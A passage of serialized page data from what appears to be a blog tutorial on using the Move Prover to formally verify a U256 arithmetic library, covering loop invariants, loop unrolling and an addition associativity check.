invariant",{"type":27,"tag":1232,"props":18308,"children":18309},{},[18310],{"type":33,"value":18311},"Assume the loop guard (the code inside the while condition)",{"type":27,"tag":1232,"props":18313,"children":18314},{},[18315],{"type":33,"value":18316},"Run the loop body",{"type":27,"tag":1232,"props":18318,"children":18319},{},[18320],{"type":33,"value":18296},{"type":27,"tag":36,"props":18322,"children":18323},{},[18324],{"type":33,"value":18325},"There are two approaches to dealing with loops.",{"type":27,"tag":36,"props":18327,"children":18328},{},[18329],{"type":33,"value":18330},"The first would be to specify a loop invariant.",{"type":27,"tag":36,"props":18332,"children":18333},{},[18334,18336,18343],{"type":33,"value":18335},"In order to specify the loop invariant, we need to use some special syntax, as we explored briefly in our ",{"type":27,"tag":47,"props":18337,"children":18340},{"href":18338,"rel":18339},"https://osec.io/blog/tutorials/2022-09-06-move-introduction/",[51],[18341],{"type":33,"value":18342},"previous post",{"type":33,"value":1041},{"type":27,"tag":101,"props":18345,"children":18347},{"code":18346,"language":10269,"meta":7,"className":10270,"style":7}," while ({\n spec {\n invariant len(amounts_times_coins) == i;\n invariant i \u003C= n_coins;\n invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n };\n (i \u003C n_coins)\n }) {\n vector::push_back(\n &mut amounts_times_coins,\n (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n );\n i = i + 1;\n };\n",[18348],{"type":27,"tag":84,"props":18349,"children":18350},{"__ignoreMap":7},[18351,18363,18374,18410,18433,18516,18523,18547,18555,18575,18595,18686,18693,18721],{"type":27,"tag":207,"props":18352,"children":18353},{"class":209,"line":210},[18354,18359],{"type":27,"tag":207,"props":18355,"children":18356},{"style":376},[18357],{"type":33,"value":18358}," while",{"type":27,"tag":207,"props":18360,"children":18361},{"style":238},[18362],{"type":33,"value":15813},{"type":27,"tag":207,"props":18364,"children":18365},{"class":209,"line":244},[18366,18370],{"type":27,"tag":207,"props":18367,"children":18368},{"style":220},[18369],{"type":33,"value":16208},{"type":27,"tag":207,"props":18371,"children":18372},{"style":238},[18373],{"type":33,"value":384},{"type":27,"tag":207,"props":18375,"children":18376},{"class":209,"line":270},[18377,18382,18386,18390,18394,18398,18402,18406],{"type":27,"tag":207,"props":18378,"children":18379},{"style":220},[18380],{"type":33,"value":18381}," invariant",{"type":27,"tag":207,"props":18383,"children":18384},{"style":1335},[18385],{"type":33,"value":15838},{"type":27,"tag":207,"props":18387,"children":18388},{"style":238},[18389],{"type":33,"value":1343},{"type":27,"tag":207,"props":18391,"children":18392},{"style":220},[18393],{"type":33,"value":15847},{"type":27,"tag":207,"props":18395,"children":18396},{"style":238},[18397],{"type":33,"value":2222},{"type":27,"tag":207,"props":18399,"children":18400},{"style":226},[18401],{"type":33,"value":15856},{"type":27,"tag":207,"props":18403,"children":18404},{"style":220},[18405],{"type":33,"value":4671},{"type":27,"tag":207,"props":18407,"children":18408},{"style":238},[18409],{"type":33,"value":241},{"type":27,"tag":207,"props":18411,"children":18412},{"class":209,"line":296},[18413,18417,18421,18425,18429],{"type":27,"tag":207,"props":18414,"children":18415},{"style":220},[18416],{"type":33,"value":18381},{"type":27,"tag":207,"props":18418,"children":18419},{"style":220},[18420],{"type":33,"value":4671},{"type":27,"tag":207,"props":18422,"children":18423},{"style":226},[18424],{"type":33,"value":15478},{"type":27,"tag":207,"props":18426,"children":18427},{"style":220},[18428],{"type":33,"value":15768},{"type":27,"tag":207,"props":18430,"children":18431},{"style":238},[18432],{"type":33,"value":241},{"type":27,"tag":207,"props":18434,"children":18435},{"class":209,"line":445},[18436,18440,18444,18448,18452,18456,18460,18464,18468,18472,18476,18480,18484,18488,18492,18496,18500,18504,18508,18512],{"type":27,"tag":207,"props":18437,"children":18438},{"style":220},[18439],{"type":33,"value":18381},{"type":27,"tag":207,"props":18441,"children":18442},{"style":220},[18443],{"type":33,"value":15899},{"type":27,"tag":207,"props":18445,"children":18446},{"style":220},[18447],{"type":33,"value":15904},{"type":27,"tag":207,"props":18449,"children":18450},{"style":214},[18451],{"type":33,"value":10331},{"type":27,"tag":207,"props":18453,"children":18454},{"style":232},[18455],{"type":33,"value":4680},{"type":27,"tag":207,"props":18457,"children":18458},{"style":226},[18459],{"type":33,"value":10340},{"type":27,"tag":207,"props":18461,"children":18462},{"style":220},[18463],{"type":33,"value":4690},{"type":27,"tag":207,"props":18465,"children":18466},{"style":226},[18467],{"type":33,"value":736},{"type":27,"tag":207,"props":18469,"children":18470},{"style":220},[18471],{"type":33,"value":15703},{"type":27,"tag":207,"props":18473,"children":18474},{"style":238},[18475],{"type":33,"value":11019},{"type":27,"tag":207,"props":18477,"children":18478},{"style":220},[18479],{"type":33,"value":15937},{"type":27,"tag":207,"props":18481,"children":18482},{"style":238},[18483],{"type":33,"value":15942},{"type":27,"tag":207,"props":18485,"children":18486},{"style":226},[18487],{"type":33,"value":15856},{"type":27,"tag":207,"props":18489,"children":18490},{"style":220},[18491],{"type":33,"value":15951},{"type":27,"tag":207,"props":18493,"children":18494},{"style":238},[18495],{"type":33,"value":11019},{"type":27,"tag":207,"props":18497,"children":18498},{"style":220},[18499],{"type":33,"value":15937},{"type":27,"tag":207,"props":18501,"children":18502},{"style":238},[18503],{"type":33,"value":15942},{"type":27,"tag":207,"props":18505,"children":18506},{"style":226},[18507],{"type":33,"value":9286},{"type":27,"tag":207,"props":18509,"children":18510},{"style":220},[18511],{"type":33,"value":15768},{"type":27,"tag":207,"props":18513,"children":18514},{"style":238},[18515],{"type":33,"value":241},{"type":27,"tag":207,"props":18517,"children":18518},{"class":209,"line":867},[18519],{"type":27,"tag":207,"props":18520,"children":18521},{"style":238},[18522],{"type":33,"value":16200},{"type":27,"tag":207,"props":18524,"children":18525},{"class":209,"line":892},[18526,18531,18535,18539,18543],{"type":27,"tag":207,"props":18527,"children":18528},{"style":238},[18529],{"type":33,"value":18530}," (",{"type":27,"tag":207,"props":18532,"children":18533},{"style":220},[18534],{"type":33,"value":4690},{"type":27,"tag":207,"props":18536,"children":18537},{"style":226},[18538],{"type":33,"value":4695},{"type":27,"tag":207,"props":18540,"children":18541},{"style":220},[18542],{"type":33,"value":15768},{"type":27,"tag":207,"props":18544,"children":18545},{"style":238},[18546],{"type":33,"value":10449},{"type":27,"tag":207,"props":18548,"children":18549},{"class":209,"line":1475},[18550],{"type":27,"tag":207,"props":18551,"children":18552},{"style":238},[18553],{"type":33,"value":18554}," }) {\n",{"type":27,"tag":207,"props":18556,"children":18557},{"class":209,"line":2065},[18558,18563,18567,18571],{"type":27,"tag":207,"props":18559,"children":18560},{"style":238},[18561],{"type":33,"value":18562}," vector",{"type":27,"tag":207,"props":18564,"children":18565},{"style":226},[18566],{"type":33,"value":10768},{"type":27,"tag":207,"props":18568,"children":18569},{"style":1335},[18570],{"type":33,"value":16032},{"type":27,"tag":207,"props":18572,"children":18573},{"style":238},[18574],{"type":33,"value":9090},{"type":27,"tag":207,"props":18576,"children":18577},{"class":209,"line":2092},[18578,18583,18587,18591],{"type":27,"tag":207,"props":18579,"children":18580},{"style":226},[18581],{"type":33,"value":18582}," &",{"type":27,"tag":207,"props":18584,"children":18585},{"style":214},[18586],{"type":33,"value":11009},{"type":27,"tag":207,"props":18588,"children":18589},{"style":220},[18590],{"type":33,"value":15703},{"type":27,"tag":207,"props":18592,"children":18593},{"style":238},[18594],{"type":33,"value":1842},{"type":27,"tag":207,"props":18596,"children":18597},{"class":209,"line":2130},[18598,18602,18606,18610,18614,18618,18622,18626,18630,18634,18638,18642,18646,18650,18654,18658,18662,18666,18670,18674,18678,18682],{"type":27,"tag":207,"props":18599,"children":18600},{"style":238},[18601],{"type":33,"value":15991},{"type":27,"tag":207,"props":18603,"children":18604},{"style":226},[18605],{"type":33,"value":9286},{"type":27,"tag":207,"props":18607,"children":18608},{"style":238},[18609],{"type":33,"value":16073},{"type":27,"tag":207,"props":18611,"children":18612},{"style":226},[18613],{"type":33,"value":10768},{"type":27,"tag":207,"props":18615,"children":18616},{"style":1335},[18617],{"type":33,"value":16082},{"type":27,"tag":207,"props":18619,"children":18620},{"style":238},[18621],{"type":33,"value":1343},{"type":27,"tag":207,"props":18623,"children":18624},{"style":226},[18625],{"type":33,"value":10398},{"type":27,"tag":207,"props":18627,"children":18628},{"style":220},[18629],{"type":33,"value":15648},{"type":27,"tag":207,"props":18631,"children":18632},{"style":238},[18633],{"type":33,"value":16099},{"type":27,"tag":207,"props":18635,"children":18636},{"style":220},[18637],{"type":33,"value":4690},{"type":27,"tag":207,"props":18639,"children":18640},{"style":214},[18641],{"type":33,"value":16108},{"type":27,"tag":207,"props":18643,"children":18644},{"style":8920},[18645],{"type":33,"value":13142},{"type":27,"tag":207,"props":18647,"children":18648},{"style":238},[18649],{"type":33,"value":16117},{"type":27,"tag":207,"props":18651,"children":18652},{"style":214},[18653],{"type":33,"value":16122},{"type":27,"tag":207,"props":18655,"children":18656},{"style":8920},[18657],{"type":33,"value":16127},{"type":27,"tag":207,"props":18659,"children":18660},{"style":238},[18661],{"type":33,"value":2222},{"type":27,"tag":207,"props":18663,"children":18664},{"style":226},[18665],{"type":33,"value":9286},{"type":27,"tag":207,"props":18667,"children":18668},{"style":238},[18669],{"type":33,"value":686},{"type":27,"tag":207,"props":18671,"children":18672},{"style":220},[18673],{"type":33,"value":16144},{"type":27,"tag":207,"props":18675,"children":18676},{"style":214},[18677],{"type":33,"value":16108},{"type":27,"tag":207,"props":18679,"children":18680},{"style":8920},[18681],{"type":33,"value":16127},{"type":27,"tag":207,"props":18683,"children":18684},{"style":238},[18685],{"type":33,"value":10449},{"type":27,"tag":207,"props":18687,"children":18688},{"class":209,"line":2168},[18689],{"type":27,"tag":207,"props":18690,"children":18691},{"style":238},[18692],{"type":33,"value":14048},{"type":27,"tag":207,"props":18694,"children":18695},{"class":209,"line":4095},[18696,18701,18705,18709,18713,18717],{"type":27,"tag":207,"props":18697,"children":18698},{"style":220},[18699],{"type":33,"value":18700}," i",{"type":27,"tag":207,"props":18702,"children":18703},{"style":226},[18704],{"type":33,"value":229},{"type":27,"tag":207,"props":18706,"children":18707},{"style":220},[18708],{"type":33,"value":4671},{"type":27,"tag":207,"props":18710,"children":18711},{"style":226},[18712],{"type":33,"value":1374},{"type":27,"tag":207,"props":18714,"children":18715},{"style":232},[18716],{"type":33,"value":235},{"type":27,"tag":207,"props":18718,"children":18719},{"style":238},[18720],{"type":33,"value":241},{"type":27,"tag":207,"props":18722,"children":18723},{"class":209,"line":4103},[18724],{"type":27,"tag":207,"props":18725,"children":18726},{"style":238},[18727],{"type":33,"value":18728}," };\n",{"type":27,"tag":36,"props":18730,"children":18731},{},[18732,18734,18740,18742,18747,18749,18755],{"type":33,"value":18733},"In this case, the brackets specify the loop invariant for the ",{"type":27,"tag":84,"props":18735,"children":18737},{"className":18736},[],[18738],{"type":33,"value":18739},"while",{"type":33,"value":18741}," loop. Note that because the loop invariant executes ",{"type":27,"tag":942,"props":18743,"children":18744},{},[18745],{"type":33,"value":18746},"after",{"type":33,"value":18748}," the loop guard, so we need to account for an extra step with ",{"type":27,"tag":84,"props":18750,"children":18752},{"className":18751},[],[18753],{"type":33,"value":18754},"i \u003C= n_coins",{"type":33,"value":1041},{"type":27,"tag":101,"props":18757,"children":18759},{"code":18758,"language":10269,"meta":7,"className":10270,"style":7}," while ({\n spec {\n invariant len(amounts_times_coins) == i;\n invariant i \u003C= n_coins;\n invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n };\n (i \u003C n_coins)\n }) {\n",[18760],{"type":27,"tag":84,"props":18761,"children":18762},{"__ignoreMap":7},[18763,18774,18785,18820,18843,18926,18933,18956],{"type":27,"tag":207,"props":18764,"children":18765},{"class":209,"line":210},[18766,18770],{"type":27,"tag":207,"props":18767,"children":18768},{"style":376},[18769],{"type":33,"value":18358},{"type":27,"tag":207,"props":18771,"children":18772},{"style":238},[18773],{"type":33,"value":15813},{"type":27,"tag":207,"props":18775,"children":18776},{"class":209,"line":244},[18777,18781],{"type":27,"tag":207,"props":18778,"children":18779},{"style":220},[18780],{"type":33,"value":16208},{"type":27,"tag":207,"props":18782,"children":18783},{"style":238},[18784],{"type":33,"value":384},{"type":27,"tag":207,"props":18786,"children":18787},{"class":209,"line":270},[18788,18792,18796,18800,18804,18808,18812,18816],{"type":27,"tag":207,"props":18789,"children":18790},{"style":220},[18791],{"type":33,"value":18381},{"type":27,"tag":207,"props":18793,"children":18794},{"style":1335},[18795],{"type":33,"value":15838},{"type":27,"tag":207,"props":18797,"children":18798},{"style":238},[18799],{"type":33,"value":1343},{"type":27,"tag":207,"props":18801,"children":18802},{"style":220},[18803],{"type":33,"value":15847},{"type":27,"tag":207,"props":18805,"children":18806},{"style":238},[18807],{"type":33,"value":2222},{"type":27,"tag":207,"props":18809,"children":18810},{"style":226},[18811],{"type":33,"value":15856},{"type":27,"tag":207,"props":18813,"children":18814},{"style":220},[18815],{"type":33,"value":4671},{"type":27,"tag":207,"props":18817,"children":18818},{"style":238},[18819],{"type":33,"value":241},{"type":27,"tag":207,"props":18821,"children":18822},{"class":209,"line":296},[18823,18827,18831,18835,18839],{"type":27,"tag":207,"props":18824,"children":18825},{"style":220},[18826],{"type":33,"value":18381},{"type":27,"tag":207,"props":18828,"children":18829},{"style":220},[18830],{"type":33,"value":4671},{"type":27,"tag":207,"props":18832,"children":18833},{"style":226},[18834],{"type":33,"value":15478},{"type":27,"tag":207,"props":18836,"children":18837},{"style":220},[18838],{"type":33,"value":15768},{"type":27,"tag":207,"props":18840,"children":18841},{"style":238},[18842],{"type":33,"value":241},{"type":27,"tag":207,"props":18844,"children":18845},{"class":209,"line":445},[18846,18850,18854,18858,18862,18866,18870,18874,18878,18882,18886,18890,18894,18898,18902,18906,18910,18914,18918,18922],{"type":27,"tag":207,"props":18847,"children":18848},{"style":220},[18849],{"type":33,"value":18381},{"type":27,"tag":207,"props":18851,"children":18852},{"style":220},[18853],{"type":33,"value":15899},{"type":27,"tag":207,"props":18855,"children":18856},{"style":220},[18857],{"type":33,"value":15904},{"type":27,"tag":207,"props":18859,"children":18860},{"style":214},[18861],{"type":33,"value":10331},{"type":27,"tag":207,"props":18863,"children":18864},{"style":232},[18865],{"type":33,"value":4680},{"type":27,"tag":207,"props":18867,"children":18868},{"style":226},[18869],{"type":33,"value":10340},{"type":27,"tag":207,"props":18871,"children":18872},{"style":220},[18873],{"type":33,"value":4690},{"type":27,"tag":207,"props":18875,"children":18876},{"style":226},[18877],{"type":33,"value":736},{"type":27,"tag":207,"props":18879,"children":18880},{"style":220},[18881],{"type":33,"value":15703},{"type":27,"tag":207,"props":18883,"children":18884},{"style":238},[18885],{"type":33,"value":11019},{"type":27,"tag":207,"props":18887,"children":18888},{"style":220},[18889],{"type":33,"value":15937},{"type":27,"tag":207,"props":18891,"children":18892},{"style":238},[18893],{"type":33,"value":15942},{"type":27,"tag":207,"props":18895,"children":18896},{"style":226},[18897],{"type":33,"value":15856},{"type":27,"tag":207,"props":18899,"children":18900},{"style":220},[18901],{"type":33,"value":15951},{"type":27,"tag":207,"props":18903,"children":18904},{"style":238},[18905],{"type":33,"value":11019},{"type":27,"tag":207,"props":18907,"children":18908},{"style":220},[18909],{"type":33,"value":15937},{"type":27,"tag":207,"props":18911,"children":18912},{"style":238},[18913],{"type":33,"value":15942},{"type":27,"tag":207,"props":18915,"children":18916},{"style":226},[18917],{"type":33,"value":9286},{"type":27,"tag":207,"props":18919,"children":18920},{"style":220},[18921],{"type":33,"value":15768},{"type":27,"tag":207,"props":18923,"children":18924},{"style":238},[18925],{"type":33,"value":241},{"type":27,"tag":207,"props":18927,"children":18928},{"class":209,"line":867},[18929],{"type":27,"tag":207,"props":18930,"children":18931},{"style":238},[18932],{"type":33,"value":16200},{"type":27,"tag":207,"props":18934,"children":18935},{"class":209,"line":892},[18936,18940,18944,18948,18952],{"type":27,"tag":207,"props":18937,"children":18938},{"style":238},[18939],{"type":33,"value":18530},{"type":27,"tag":207,"props":18941,"children":18942},{"style":220},[18943],{"type":33,"value":4690},{"type":27,"tag":207,"props":18945,"children":18946},{"style":226},[18947],{"type":33,"value":4695},{"type":27,"tag":207,"props":18949,"children":18950},{"style":220},[18951],{"type":33,"value":15768},{"type":27,"tag":207,"props":18953,"children":18954},{"style":238},[18955],{"type":33,"value":10449},{"type":27,"tag":207,"props":18957,"children":18958},{"class":209,"line":1475},[18959],{"type":27,"tag":207,"props":18960,"children":18961},{"style":238},[18962],{"type":33,"value":18554},{"type":27,"tag":36,"props":18964,"children":18965},{},[18966],{"type":33,"value":18967},"Loop invariants are often difficult to write, especially for nontrivial loop bodies.",{"type":27,"tag":36,"props":18969,"children":18970},{},[18971,18973,18978],{"type":33,"value":18972},"The second solution to dealing with loops is to unroll the loop. This technique works in this particular situation because, as we can observe, the loop within the ",{"type":27,"tag":84,"props":18974,"children":18976},{"className":18975},[],[18977],{"type":33,"value":16914},{"type":33,"value":18979}," function will always iterate exactly 4 times:",{"type":27,"tag":101,"props":18981,"children":18983},{"code":18982,"language":10269,"meta":7,"className":10270,"style":7},"/// Total words in `U256` (64 * 4 = 256).\nconst WORDS: u64 = 4;\n\n[...]\n\nlet i = 0;\nwhile (i \u003C WORDS) {\n let a1 = get(&a, i);\n let b1 = get(&b, i);\n\n[...]\n",[18984],{"type":27,"tag":84,"props":18985,"children":18986},{"__ignoreMap":7},[18987,18995,19028,19035,19051,19058,19081,19105,19150,19194,19201],{"type":27,"tag":207,"props":18988,"children":18989},{"class":209,"line":210},[18990],{"type":27,"tag":207,"props":18991,"children":18992},{"style":4647},[18993],{"type":33,"value":18994},"/// Total words in `U256` (64 * 4 = 256).\n",{"type":27,"tag":207,"props":18996,"children":18997},{"class":209,"line":244},[18998,19002,19007,19011,19015,19019,19024],{"type":27,"tag":207,"props":18999,"children":19000},{"style":214},[19001],{"type":33,"value":16931},{"type":27,"tag":207,"props":19003,"children":19004},{"style":238},[19005],{"type":33,"value":19006}," WORDS",{"type":27,"tag":207,"props":19008,"children":19009},{"style":226},[19010],{"type":33,"value":736},{"type":27,"tag":207,"props":19012,"children":19013},{"style":8920},[19014],{"type":33,"value":13142},{"type":27,"tag":207,"props":19016,"children":19017},{"style":226},[19018],{"type":33,"value":229},{"type":27,"tag":207,"props":19020,"children":19021},{"style":232},[19022],{"type":33,"value":19023}," 4",{"type":27,"tag":207,"props":19025,"children":19026},{"style":238},[19027],{"type":33,"value":241},{"type":27,"tag":207,"props":19029,"children":19030},{"class":209,"line":270},[19031],{"type":27,"tag":207,"props":19032,"children":19033},{"emptyLinePlaceholder":19},[19034],{"type":33,"value":2062},{"type":27,"tag":207,"props":19036,"children":19037},{"class":209,"line":296},[19038,19042,19046],{"type":27,"tag":207,"props":19039,"children":19040},{"style":238},[19041],{"type":33,"value":11019},{"type":27,"tag":207,"props":19043,"children":19044},{"style":226},[19045],{"type":33,"value":16867},{"type":27,"tag":207,"props":19047,"children":19048},{"style":238},[19049],{"type":33,"value":19050},"]\n",{"type":27,"tag":207,"props":19052,"children":19053},{"class":209,"line":445},[19054],{"type":27,"tag":207,"props":19055,"children":19056},{"emptyLinePlaceholder":19},[19057],{"type":33,"value":2062},{"type":27,"tag":207,"props":19059,"children":19060},{"class":209,"line":867},[19061,19065,19069,19073,19077],{"type":27,"tag":207,"props":19062,"children":19063},{"style":214},[19064],{"type":33,"value":217},{"type":27,"tag":207,"props":19066,"children":19067},{"style":220},[19068],{"type":33,"value":4671},{"type":27,"tag":207,"props":19070,"children":19071},{"style":226},[19072],{"type":33,"value":229},{"type":27,"tag":207,"props":19074,"children":19075},{"style":232},[19076],{"type":33,"value":4680},{"type":27,"tag":207,"props":19078,"children":19079},{"style":238},[19080],{"type":33,"value":241},{"type":27,"tag":207,"props":19082,"children":19083},{"class":209,"line":892},[19084,19088,19092,19096,19100],{"type":27,"tag":207,"props":19085,"children":19086},{"style":376},[19087],{"type":33,"value":18739},{"type":27,"tag":207,"props":19089,"children":19090},{"style":238},[19091],{"type":33,"value":686},{"type":27,"tag":207,"props":19093,"children":19094},{"style":220},[19095],{"type":33,"value":4690},{"type":27,"tag":207,"props":19097,"children":19098},{"style":226},[19099],{"type":33,"value":4695},{"type":27,"tag":207,"props":19101,"children":19102},{"style":238},[19103],{"type":33,"value":19104}," WORDS) {\n",{"type":27,"tag":207,"props":19106,"children":19107},{"class":209,"line":1475},[19108,19112,19117,19121,19126,19130,19134,19138,19142,19146],{"type":27,"tag":207,"props":19109,"children":19110},{"style":214},[19111],{"type":33,"value":10290},{"type":27,"tag":207,"props":19113,"children":19114},{"style":220},[19115],{"type":33,"value":19116}," a1",{"type":27,"tag":207,"props":19118,"children":19119},{"style":226},[19120],{"type":33,"value":229},{"type":27,"tag":207,"props":19122,"children":19123},{"style":1335},[19124],{"type":33,"value":19125}," get",{"type":27,"tag":207,"props":19127,"children":19128},{"style":238},[19129],{"type":33,"value":1343},{"type":27,"tag":207,"props":19131,"children":19132},{"style":226},[19133],{"type":33,"value":10398},{"type":27,"tag":207,"props":19135,"children":19136},{"style":220},[19137],{"type":33,"value":47},{"type":27,"tag":207,"props":19139,"children":19140},{"style":238},[19141],{"type":33,"value":1123},{"type":27,"tag":207,"props":19143,"children":19144},{"style":220},[19145],{"type":33,"value":4690},{"type":27,"tag":207,"props":19147,"children":19148},{"style":238},[19149],{"type":33,"value":1455},{"type":27,"tag":207,"props":19151,"children":19152},{"class":209,"line":2065},[19153,19157,19162,19166,19170,19174,19178,19182,19186,19190],{"type":27,"tag":207,"props":19154,"children":19155},{"style":214},[19156],{"type":33,"value":10290},{"type":27,"tag":207,"props":19158,"children":19159},{"style":220},[19160],{"type":33,"value":19161}," b1",{"type":27,"tag":207,"props":19163,"children":19164},{"style":226},[19165],{"type":33,"value":229},{"type":27,"tag":207,"props":19167,"children":19168},{"style":1335},[19169],{"type":33,"value":19125},{"type":27,"tag":207,"props":19171,"children":19172},{"style":238},[19173],{"type":33,"value":1343},{"type":27,"tag":207,"props":19175,"children":19176},{"style":226},[19177],{"type":33,"value":10398},{"type":27,"tag":207,"props":19179,"children":19180},{"style":220},[19181],{"type":33,"value":10512},{"type":27,"tag":207,"props":19183,"children":19184},{"style":238},[19185],{"type":33,"value":1123},{"type":27,"tag":207,"props":19187,"children":19188},{"style":220},[19189],{"type":33,"value":4690},{"type":27,"tag":207,"props":19191,"children":19192},{"style":238},[19193],{"type":33,"value":1455},{"type":27,"tag":207,"props":19195,"children":19196},{"class":209,"line":2092},[19197],{"type":27,"tag":207,"props":19198,"children":19199},{"emptyLinePlaceholder":19},[19200],{"type":33,"value":2062},{"type":27,"tag":207,"props":19202,"children":19203},{"class":209,"line":2130},[19204,19208,19212],{"type":27,"tag":207,"props":19205,"children":19206},{"style":238},[19207],{"type":33,"value":11019},{"type":27,"tag":207,"props":19209,"children":19210},{"style":226},[19211],{"type":33,"value":16867},{"type":27,"tag":207,"props":19213,"children":19214},{"style":238},[19215],{"type":33,"value":19050},{"type":27,"tag":36,"props":19217,"children":19218},{},[19219],{"type":33,"value":19220},"Unrolling the function and running again the Move Prover will print out a \"Success\" message!",{"type":27,"tag":101,"props":19222,"children":19224},{"code":19223},"SUCCESS proving 1 modules from package `u256` in 9.685s\n{\n \"Result\": \"Success\"\n}\n",[19225],{"type":27,"tag":84,"props":19226,"children":19227},{"__ignoreMap":7},[19228],{"type":33,"value":19223},{"type":27,"tag":36,"props":19230,"children":19231},{},[19232,19234,19239,19240,19246],{"type":33,"value":19233},"For the ",{"type":27,"tag":12606,"props":19235,"children":19236},{},[19237],{"type":33,"value":19238},"Associative Property",{"type":33,"value":686},{"type":27,"tag":84,"props":19241,"children":19243},{"className":19242},[],[19244],{"type":33,"value":19245},"a+(b+c) = (a+b)+c",{"type":33,"value":19247},") to be true, changing the grouping of addends should not change the sum. To verify this, we will first implement a function which simulates this property:",{"type":27,"tag":101,"props":19249,"children":19251},{"code":19250,"language":10269,"meta":7,"className":10270,"style":7},"fun add_assoc_property(a: U256, b: U256, c: U256): bool {\n let result_1 = add(b, c);\n let result_11 = add(a, result_1);\n let result_2 = add(a, b);\n let result_22 = add(c, result_2);\n\n let cmp = compare(&result_11, &result_22);\n if ( cmp == EQUAL ) true else false\n}\n",[19252],{"type":27,"tag":84,"props":19253,"children":19254},{"__ignoreMap":7},[19255,19332,19371,19412,19451,19492,19499,19549,19589],{"type":27,"tag":207,"props":19256,"children":19257},{"class":209,"line":210},[19258,19262,19267,19271,19275,19279,19283,19287,19291,19295,19299,19303,19307,19311,19315,19319,19323,19328],{"type":27,"tag":207,"props":19259,"children":19260},{"style":220},[19261],{"type":33,"value":14389},{"type":27,"tag":207,"props":19263,"children":19264},{"style":1335},[19265],{"type":33,"value":19266}," add_assoc_property",{"type":27,"tag":207,"props":19268,"children":19269},{"style":238},[19270],{"type":33,"value":1343},{"type":27,"tag":207,"props":19272,"children":19273},{"style":220},[19274],{"type":33,"value":47},{"type":27,"tag":207,"props":19276,"children":19277},{"style":226},[19278],{"type":33,"value":736},{"type":27,"tag":207,"props":19280,"children":19281},{"style":8920},[19282],{"type":33,"value":12011},{"type":27,"tag":207,"props":19284,"children":19285},{"style":238},[19286],{"type":33,"value":1123},{"type":27,"tag":207,"props":19288,"children":19289},{"style":220},[19290],{"type":33,"value":10512},{"type":27,"tag":207,"props":19292,"children":19293},{"style":226},[19294],{"type":33,"value":736},{"type":27,"tag":207,"props":19296,"children":19297},{"style":8920},[19298],{"type":33,"value":12011},{"type":27,"tag":207,"props":19300,"children":19301},{"style":238},[19302],{"type":33,"value":1123},{"type":27,"tag":207,"props":19304,"children":19305},{"style":220},[19306],{"type":33,"value":10435},{"type":27,"tag":207,"props":19308,"children":19309},{"style":226},[19310],{"type":33,"value":736},{"type":27,"tag":207,"props":19312,"children":19313},{"style":8920},[19314],{"type":33,"value":12011},{"type":27,"tag":207,"props":19316,"children":19317},{"style":238},[19318],{"type":33,"value":10416},{"type":27,"tag":207,"props":19320,"children":19321},{"style":226},[19322],{"type":33,"value":736},{"type":27,"tag":207,"props":19324,"children":19325},{"style":8920},[19326],{"type":33,"value":19327}," bool",{"type":27,"tag":207,"props":19329,"children":19330},{"style":238},[19331],{"type":33,"value":384},{"type":27,"tag":207,"props":19333,"children":19334},{"class":209,"line":244},[19335,19339,19343,19347,19351,19355,19359,19363,19367],{"type":27,"tag":207,"props":19336,"children":19337},{"style":214},[19338],{"type":33,"value":10290},{"type":27,"tag":207,"props":19340,"children":19341},{"style":220},[19342],{"type":33,"value":15473},{"type":27,"tag":207,"props":19344,"children":19345},{"style":226},[19346],{"type":33,"value":229},{"type":27,"tag":207,"props":19348,"children":19349},{"style":1335},[19350],{"type":33,"value":16857},{"type":27,"tag":207,"props":19352,"children":19353},{"style":238},[19354],{"type":33,"value":1343},{"type":27,"tag":207,"props":19356,"children":19357},{"style":220},[19358],{"type":33,"value":10512},{"type":27,"tag":207,"props":19360,"children":19361},{"style":238},[19362],{"type":33,"value":1123},{"type":27,"tag":207,"props":19364,"children":19365},{"style":220},[19366],{"type":33,"value":10435},{"type":27,"tag":207,"props":19368,"children":19369},{"style":238},[19370],{"type":33,"value":1455},{"type":27,"tag":207,"props":19372,"children":19373},{"class":209,"line":270},[19374,19378,19383,19387,19391,19395,19399,19403,19408],{"type":27,"tag":207,"props":19375,"children":19376},{"style":214},[19377],{"type":33,"value":10290},{"type":27,"tag":207,"props":19379,"children":19380},{"style":220},[19381],{"type":33,"value":19382}," result_11",{"type":27,"tag":207,"props":19384,"children":19385},{"style":226},[19386],{"type":33,"value":229},{"type":27,"tag":207,"props":19388,"children":19389},{"style":1335},[19390],{"type":33,"value":16857},{"type":27,"tag":207,"props":19392,"children":19393},{"style":238},[19394],{"type":33,"value":1343},{"type":27,"tag":207,"props":19396,"children":19397},{"style":220},[19398],{"type":33,"value":47},{"type":27,"tag":207,"props":19400,"children":19401},{"style":238},[19402],{"type":33,"value":1123},{"type":27,"tag":207,"props":19404,"children":19405},{"style":220},[19406],{"type":33,"value":19407},"result_1",{"type":27,"tag":207,"props":19409,"children":19410},{"style":238},[19411],{"type":33,"value":1455},{"type":27,"tag":207,"props":19413,"children":19414},{"class":209,"line":296},[19415,19419,19423,19427,19431,19435,19439,19443,19447],{"type":27,"tag":207,"props":19416,"children":19417},{"style":214},[19418],{"type":33,"value":10290},{"type":27,"tag":207,"props":19420,"children":19421},{"style":220},[19422],{"type":33,"value":15499},{"type":27,"tag":207,"props":19424,"children":19425},{"style":226},[19426],{"type":33,"value":229},{"type":27,"tag":207,"props":19428,"children":19429},{"style":1335},[19430],{"type":33,"value":16857},{"type":27,"tag":207,"props":19432,"children":19433},{"style":238},[19434],{"type":33,"value":1343},{"type":27,"tag":207,"props":19436,"children":19437},{"style":220},[19438],{"type":33,"value":47},{"type":27,"tag":207,"props":19440,"children":19441},{"style":238},[19442],{"type":33,"value":1123},{"type":27,"tag":207,"props":19444,"children":19445},{"style":220},[19446],{"type":33,"value":10512},{"type":27,"tag":207,"props":19448,"children":19449},{"style":238},[19450],{"type":33,"value":1455},{"type":27,"tag":207,"props":19452,"children":19453},{"class":209,"line":445},[19454,19458,19463,19467,19471,19475,19479,19483,19488],{"type":27,"tag":207,"props":19455,"children":19456},{"style":214},[19457],{"type":33,"value":10290},{"type":27,"tag":207,"props":19459,"children":19460},{"style":220},[19461],{"type":33,"value":19462}," 